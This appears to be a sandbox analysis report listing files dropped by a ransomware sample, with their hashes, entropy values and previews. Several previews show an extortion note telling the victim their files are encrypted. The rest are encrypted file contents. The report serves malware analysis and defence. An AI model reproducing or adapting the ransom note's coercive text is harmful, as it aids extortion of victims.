                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):476
                                                              Entropy (8bit):7.540644307425982
                                                              Encrypted:false
                                                              SSDEEP:12:+7KU/b3IJW6hov6CRpkcqniloH4tMj+8RyCPDp:Qzv6hqMpnrMMjtDp
                                                              MD5:F15F3162BCF198E9719E2E1ECB6AA8D6
                                                              SHA1:F310234897A383239D9C6A1BD6391DB1591036AE
                                                              SHA-256:E0450E136BB8EA16D40F88D203E6D5B47C44916217ACC49B83797EF232790BB4
                                                              SHA-512:F841A08E777E5E16CCE196A5D1738432412B2F0B37675337227650C242137F4AB931D1610F0AA905654470296C1E236C99557CDC9F390261AAC5DE63D28CEEC7
                                                              Malicious:false
                                                              Preview:.-....{..qo...U..J....T...FV....r..*.....t.m.d1QR.n..r....iAW.8...[......>.........S..:>...'L.).FI?......zk.v._;....w.1.!....1)..l.n+.SGl..+..A.].b....Ab..%..e`c.Tq..y...H..s......3;.lQ0.L. ..n.9..g(..)... =U..D.J.J.DO..ux.O.[Z(..p..3.>.?.Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X......^... .V.H.....hAa......Ji=.....O.Z..........H
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):476
                                                              Entropy (8bit):7.581591825515615
                                                              Encrypted:false
                                                              SSDEEP:12:czuVCOueyUPAAdaZLx/93flhvniloH4tMj+8SWD:czSuNAdcF9NhvnrMMjEWD
                                                              MD5:FF3492604282065970EF45A310B91FE1
                                                              SHA1:384BFC62AC6CCEBC9E6654927ADE28319C39BB43
                                                              SHA-256:40D2B467BD2CA46A0E9501DBEF25D1280576A8501F88E332FFF53F7A5DDEBE5A
                                                              SHA-512:A9DC2ACF43D81F3C4F6BDC0804353163B195DF5A230DDB76B1DE6C924406527A79BCDB1862E3A2A6A8C69BCA8740D2800C9ED3104206F17F9A2E8AB03E2D123C
                                                              Malicious:false
                                                              Preview:.4.y_.....\.`c.....%.\;f....5.?.C.\ ...U.{..Y.Pk,...O.....4X..(.".g..y.5.....]$d.I.gD.]...Y.F....dk...<-...n0...+..=.^....,e.Ck.G.@c....].......b...h.b..... ~2.;..9.K....T.t..OT...rN.j.D.K.?....gC.'..h.....~s.....L.#.f,.............vGUc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..j=Yj.......z..u.4......[.x.d.5...)..O.....+.....V.*3
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1087
                                                              Entropy (8bit):7.841500538889213
                                                              Encrypted:false
                                                              SSDEEP:24:PA75PYFom1zzw8cXOCQqulMnfetYDZs39qWObY4muqZ3eQbinrMMjKtljp:PA9YimCMCOMnfUYDWV0m1Z39IMoeBp
                                                              MD5:239DEB5D3BEB58CEF3E72F326F92EB84
                                                              SHA1:BD04BE3C0ACE8CFCFAFEB73577CC076582FBDF4B
                                                              SHA-256:B4B0AD4A427770FE3C1A5F6DA4D4C75D89C3BE67760F3721ABB7E8914FF9023E
                                                              SHA-512:D753F12BD355E5796D5EDDF0AECE044524FBD3BFAB0DE5247C31009EF34E70B8AB2CEEF735959D95B954053322C71021CA1108D0E828C174B9AB73E22DA2A321
                                                              Malicious:false
                                                              Preview:>....S5..z.kSc............uTx..c.9\.......`....V........W.#6......3 S<...`..i...^*.q6.^iO...jIDm.q3'...m..E.?..t.$...f./.D....}.....1.d..}..F..=.g..;.L.8."`;....EV0n@S..ruV.w.S.4......<g......M.. ....hP..i.).b;..x...p4....J.(%.s...0^$.....Aq..&.+.7_KHt..QLN.....:.....X.A@.8.+.4....U.a..}_MG....X.....NK;@......9.l..n.0i.%v.A\1.....w..TI...`o.d....1"..B..s%.S....3....vp..y?..........G......j....#."=<Cr2.![.. x..$.6. ../............t..e$F.L...`....<....<kgO....=50.y..#.w.. \BK..Hff..$..?+n.b.{P..f3..!.....m...7..0....8...(".+A..n...UQ...8..f.n....<DP...X..n.~...Q..n.._'.}.qI/x.d,qNl..4......J,.l....1I.9..nLy...)....l,v..F.....C%......}...+}...,.]..........Qk......\D.ZM..7..K..6G..G.._...M.ih!.qXp...u.TC7..v....*.$d...{s.%.fL..e..j...>.9....'4~..f..q...9k...b.[.5...9;....g.?.F..v........h.s...h.V. ....!..*.Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):236
                                                              Entropy (8bit):7.109048028047049
                                                              Encrypted:false
                                                              SSDEEP:6:woXKMJELW55t6IXL1foH4tMj+fUFI7eTLNEUlY:wo6niloH4tMj+8FyeNJY
                                                              MD5:FC2F60E55F5B8BAC6DBBCF082CDF24D8
                                                              SHA1:332DE82B331F222A8CDC60529491F213C3A01B7F
                                                              SHA-256:0781DC5B276EC7462AB0718557C81CA5FF38BF4AB2335D0095AE8414EDA19CF8
                                                              SHA-512:063302C1B19E625C825BF925B4732E9A9C9087030427F2A1F46D8849BC91738BDC3EB7232F7493B0E725D32160B68939526938F2EC29CC9897CADFA4D1AF6EDE
                                                              Malicious:false
                                                              Preview:Ph.. &Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..0.(....].ey.(....6..K..f.6~.i.|..8.m>S...\......H.Y
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:true
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):6708
                                                              Entropy (8bit):3.856369007359732
                                                              Encrypted:false
                                                              SSDEEP:96:GLfdiNsg3xU3TPc/H6dAdCa23R1QA/CoFZ2d9PrR5u:GLfdZ3jc/aKdCakR1l/bZ2DW
                                                              MD5:2D835A381E24DE2F2BF39E1C3A476F28
                                                              SHA1:C84B8BB67E6DC01C4DC43E24FA63A5DC8700F186
                                                              SHA-256:954D71D45628800086BC1E38B6A82107ED09A8842B2F008D4E906A411401899C
                                                              SHA-512:7819260881796E20665B43FD5D2867A9CE41291780BAB0FC36588C445E14869289321C9B7015E043A0CB10F2974670E3F9ACFE2D2D3113837B07A5039948B2AB
                                                              Malicious:false
                                                              Preview:-.-.-.=.=.=. .W.e.l.c.o.m.e... .A.g.a.i.n... .=.=.=.-.-.-.........[.+.]. .W.h.a.t.s. .H.a.p.p.e.n.?. .[.+.].........Y.o.u.r. .f.i.l.e.s. .a.r.e. .e.n.c.r.y.p.t.e.d.,. .a.n.d. .c.u.r.r.e.n.t.l.y. .u.n.a.v.a.i.l.a.b.l.e... .Y.o.u. .c.a.n. .c.h.e.c.k. .i.t.:. .a.l.l. .f.i.l.e.s. .o.n. .y.o.u. .c.o.m.p.u.t.e.r. .h.a.s. .e.x.p.a.n.s.i.o.n. .g.1.6.5.0.6.7.x.3.7.......B.y. .t.h.e. .w.a.y.,. .e.v.e.r.y.t.h.i.n.g. .i.s. .p.o.s.s.i.b.l.e. .t.o. .r.e.c.o.v.e.r. .(.r.e.s.t.o.r.e.).,. .b.u.t. .y.o.u. .n.e.e.d. .t.o. .f.o.l.l.o.w. .o.u.r. .i.n.s.t.r.u.c.t.i.o.n.s... .O.t.h.e.r.w.i.s.e.,. .y.o.u. .c.a.n.t. .r.e.t.u.r.n. .y.o.u.r. .d.a.t.a. .(.N.E.V.E.R.)...........[.+.]. .W.h.a.t. .g.u.a.r.a.n.t.e.e.s.?. .[.+.].........I.t.s. .j.u.s.t. .a. .b.u.s.i.n.e.s.s... .W.e. .a.b.s.o.l.u.t.e.l.y. .d.o. .n.o.t. .c.a.r.e. .a.b.o.u.t. .y.o.u. .a.n.d. .y.o.u.r. .d.e.a.l.s.,. .e.x.c.e.p.t. .g.e.t.t.i.n.g. .b.e.n.e.f.i.t.s... .I.f. .w.e. .d.o. .n.o.t. .d.o. .o.u.r. .w.o.r.k. .a.n.d. .l.i.a.b.i.l.i.t.i.e.s. .-. .n.o.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):65764
                                                              Entropy (8bit):7.997647740796352
                                                              Encrypted:true
                                                              SSDEEP:1536:ppbZfWCh8Qe0IcTMQxOQlrZPWTFqZ4IJFueFDG:p3bhZekTMQxOQlVPAFq2EFuKDG
                                                              MD5:3DCF599C47583E824EE9CB101F296E89
                                                              SHA1:8F77925466F2222A7DFB2F51D806058F87E1407B
                                                              SHA-256:8700BDA60E10F03BD4D87C516C1958383E7E4ED73AD7010BDBEC1C9EF9DA2377
                                                              SHA-512:41F702C6145A21AAF7BAB5C79421FA52150A9EB5B0DB771CFEAF71E7E0E1418C1DC2942C0BF3BC33BFF2F777419AABA90C4C85D5362D521B89DEA01B5CEA49C7
                                                              Malicious:false
                                                              Preview:.g..."...I...=...!=Z.'..l.......f...~........[...%.I.....:.9.= ;...R...I..Z.x..;!"..0..ee.u...n.E..BRd/.<s.G`.lZ..B.......8..X:L....#.j.P.;!./y......._........!Nk:t.vK..:....B.y..2.g..."....8p.8.....3..[.Q_vX._...X.....,[.uh..i.z...X.s..vA...".Y....Y..h...4..K.X1.y...".m.".N.P.T.......r........,..&r.>.u'.?.P2..?...1\.K.7.N......v.c..ifkd..w...*......^...:.B#Om.i..(.D"M...(.t...I..~..i....K..^up...S.X.]....Bf.$.@.e....?c...h0iI.T;...Y....$Hi..gpE0|...h.....o..5..P..3{.\_....S.;."L......l.B.=.;.;].O.....Kr..kv(1.o.U..:.e.j...X.E...fj~.,...O.U..N.?..8s....>....X.[..jn]... .J#`Vk70........x.N.d{.u...gI.e...].f.(...)b.|S0.v....J4r...D..b...}G.O..._5.Z...&..q....v.KFQ.CN9.ncj.....W..l..y..r.....lm....G..{..[%g..c..O.b|......m...."....zL[.N...."...,l6.eG.H4Mr....u%........|.E.l/...w..Nf..[H.7.v..<&...j..k..l.u.n..P.0.W....\.5..I...{G....I..C....O.RD.O:T..'........#C..z....5U.lDX.uvB.UI...@...p`....%...x.a.........D.c2....MW.k.9...A
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):20708
                                                              Entropy (8bit):7.991077676716266
                                                              Encrypted:true
                                                              SSDEEP:384:r2juwp/onl103G3RWFB0xgFT8F6Kg7yPcs8ZoeRd/6Q:r2jYIG3RxgFT8F6js4oedyQ
                                                              MD5:EF363114A2DC9AFE272D13485F271AC1
                                                              SHA1:8E0790D762EB6E2D1D9ADCEB945B100221ADDCFD
                                                              SHA-256:363ABA9F2253A7160B1B274821C8BFDC066964E774ACD856A897BA96CDA401EC
                                                              SHA-512:B8DAC3FBDA36C400CCB8F37F1B3A6740B4472484BC8B6826DEDCD4F2B350264F0D035F415B0113131A0FB834EC044300A8E774E49C95F201EC32744EFEF7FE1E
                                                              Malicious:false
                                                              Preview:..d....*....W.....^.!tO$/....}.&y..U.........B...=yQ.(L....f.s]e...y..n.~...H..A.q..;dx.mU6......7.t.e....u...?).9..*'..Nc.........g...t.dS.M..........\.7.6...\...+..C"yr...kcm..V.im^(..k.{2V..;..Du4.......C.1..Gk7.T....t.L?D..'...G...-.........[......s.....s.\..x.NZ.1aWdF0F*...E...kiz..0..2.n.fr&H).!*{..qU..h..]7.)FN.<.2&d..:.A....(...=-eA:[..H.u..c..q......_....-..m'.G.'..k...Xf..;HL.$1{...v.X..2.........]k^2.....@l..C.7....k. ...T.I.&.C..u.>."..c.....4F.=.T......,._M..m......IS".I.....R....k./.........G...t].u.!.#..F..y.?...+.IQ..2g..at.;..B..sAS.XSK.'%...|a....&$S.....$...W..vl..g..........^g\9...T.D..fK'....V.0.D8B.qS.W...seW.S..}4I.@.....K5j[I.3:......lK.,..S.l3.%(.q.....rq.....~.........l..&.Ml/.`4.(<P.|..E1.r....*^.}..V.EC..........L.*..a.n.j.Rp"..,..\..B...1b.}.S..H!..Ff...yM....n....V...Xt.;>..n.R\F.x..X.U..z.e.....F......Cr.>e@F.a..B}%.9....b..pN..X..%17D.L......B7(...Zz.~g..wu..X....nW...}...7.....u..._.R..^..h...T.$V
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):65764
                                                              Entropy (8bit):7.997071838072276
                                                              Encrypted:true
                                                              SSDEEP:1536:8aSOYE6Zzmy/lBtrdPrZ8sAiVmtKzc9clT7LXKM0o5gd:EOYvZqQBtrdKsbxw9uT7LKxOgd
                                                              MD5:F1ECF7797230E59AC26B3F38C44A75EE
                                                              SHA1:7DC906DE9317A0F0387E3E545A2D6DB24596CFE4
                                                              SHA-256:E99AE019B5F9D13C4B2B992F84B184932D91F40A70EFB2D1DE8CF0597502662A
                                                              SHA-512:22D01DDEA719C2EB530FA554554DDDB859380BC0C687DEC3B2CB0DEA271DDBACD0422D897A2FBB8F864381A494A4E9296A14605A7A0188DA135446C1457EF018
                                                              Malicious:false
                                                              Preview:.|.U2.j"._i..6j.wY...:.5t-M_8lF.eO-......q.......x.(p.+#)1U.S.....*P.....h.\^E.q.I....'j...+.D.l%v.V...%@.Q..t.....G.9I."u..^vF.@...r..w..Y......9X....X...._.. N.!.cc5.G..Q.$,"Ly.....(.k+.T....Z.\.9...h..N...gD.0+O.H........,JVRBv...i..t..`..."~.P,....R..F.F.....Y.h....ik...$.{s.k..h>.\..sq.........a.^m1z..L'.W.T).d...-.........."....a.v..2lC.....:w.J..r$.*.$l^...|.....o.....b..JC.,Z.m...x..........rp6...+Y.DR..|....yy.@c(/...Zg0W..l.>./.g......AN3B..\.F.M..-...I._....(..4..}...Q.........O.............~....S?.W..U $`...l.]N.@.m.J..u..1<l........Z.E.D.&N#.ac.k..D..s{.9.q.....1.!.K..q.C>...i-.y.g..x...edR.;...&...HM..Tt..t[.$h.....AM..S.s>%|.%7.....Kg.f....ntL.L....#0..X}.....=..2...eo..R......\.......t....I.X..F.Wa*..z...ZD)#...&.; ..;.dm.^*...T..}...cR..~.q..y.....d.}....KF.M^Q.zC...7....hLP..V...0<.m..|...P.D....ee...c.'.0....hp.OA..Y..A....xe*5...A.|+R...x..Pa.......k"6..........&w...q.R.x./.l!...q._...o.|.G.n...../.l.13rba1...Xz.M.B.....
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):524516
                                                              Entropy (8bit):7.999698450015166
                                                              Encrypted:true
                                                              SSDEEP:12288:CgahDdGIWz9N0vMU9w1a+jUdoxqAyQfDQd3T96r4:CNJspTUSM+wdondLq30k
                                                              MD5:44E85B660B63C608E6D03A7009D0F374
                                                              SHA1:DB7E826DEEDBBC16AC51741CEC1DF9558F30B3B0
                                                              SHA-256:2BC4BD786468AD9D8B07EFF7B8312255A1B1DFE0766F8C882F9BBDBB017FDCCA
                                                              SHA-512:95B32B8721A8C6B5675A09527497A96DD5C317820FD6F4AC22B525EBFB05D883F31C718F2D7FD86812D5952A292AB9AE1FAF659DDB7EBBA6AF687FC2D3A7AC3A
                                                              Malicious:false
                                                              Preview:.B..%.8.ca.wU.!.F......e.V.k..H.y.{d#.4f....p,........x|....f........N.....oi....b~^...i...t....3O.;.#.c.v...[!.t...&.2.yY.M...v..C,Y.......K..w...Ez.#w..F.....fW.%..4.6...=.Z.f.X....{Zt.kg.r.......e....<..xI...}.b+My.*......w.H...1|N/X........QM6.6.j.,.....G...q.M. .9........]{j..I.e.................!.D......:.....q.......[.....<....,...0..g).J1.:....Du3...k...FrIi...r.q....j:.v...GP\..lJ.......P..8......n.=..%...3X.AK......yo0..M.....p5'..N..}.2.HB.#..*.......D.H....d[.hj.$1.p....,.t..8...`...*Pr0q'...q..".YD/..d..">..7{8S|...!.....4..hz..zd..N_..Zg6..q.....IL......-.@=D.y._2@.W...b5....1.En.y.|.'..dXlM..0"Z..c..7\1/..N...6!.lCmo~...=!a=>..5....aR.,g..^...,.g.....o.F..!.c...Q9@...5....).G!H.7.Fy....|.Kw..'........b..m)...i8...<.vdv``..Hy...0l..N...$$...AG...R.j....QQ....\j..2.k`. .4..%.[.+4]....[.l~v.jfo.. u.....R& ..{OTz.......G`...}5.. .....i4.b..d.Z.q.D....\O..mw.....M.....}..ly.X.&.R..a.....N..7m....P.....J.F8.o+._..t.:>..+ 8(
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):524516
                                                              Entropy (8bit):7.999631010343217
                                                              Encrypted:true
                                                              SSDEEP:12288:jkt9BRPoPDNRGiVfkjI/k5r+H4O1xHw8Ketia6ILQB:wtoDvl6+YexHtNiaVLe
                                                              MD5:91534450BDC01628547A707FA88A22B1
                                                              SHA1:F739CCEDD76ECA2260DEC6B661946CF1F84FAF3C
                                                              SHA-256:3DB9F11899D1A46565D1146D9F2F770430DC890DCF171753EF23788E62D102B9
                                                              SHA-512:4397315AAAA187C0FB680626C40B3F0E0A64B1CC2C3CF098FE83DC16640EA6B9A4F3044AF85A6A9143416D9CFD9602CE52F6D47FDDCA78D2E2CE4D2239B7A21B
                                                              Malicious:false
